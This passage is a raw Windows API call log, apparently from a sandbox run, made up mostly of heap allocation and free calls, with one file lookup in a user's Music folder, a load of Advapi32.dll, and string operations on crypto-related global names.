RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0115.060] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0115.061] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0115.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0115.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0115.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.062] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.062] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\0QhbS_hT9Zbd62A.m4a", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0f9c40, ftCreationTime.dwHighDateTime=0x1d5ed25, ftLastAccessTime.dwLowDateTime=0xd9ec78c0, ftLastAccessTime.dwHighDateTime=0x1d5e6b5, ftLastWriteTime.dwLowDateTime=0xd9ec78c0, ftLastWriteTime.dwHighDateTime=0x1d5e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x6953, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="0QhbS_hT9Zbd62A.m4a", cAlternateFileName="0QHBS_~1.M4A")) returned 0x41ac600 [0115.063] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.063] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.063] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.064] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0115.064] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0115.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0115.064] PeekMessageW (in: lpMsg=0x144e7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7b4) returned 0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.064] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0115.064] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0115.065] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.065] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.065] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.065] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0115.066] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0115.066] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0115.066] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0115.066] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0115.066] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0115.067] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0115.067] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.067] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0115.067] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0115.068] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.068] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0115.068] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.069] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0115.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa00 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0115.069] PeekMessageW (in: lpMsg=0x144e584, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e584) returned 0 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0115.069] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0115.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.070] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.071] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.071] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) 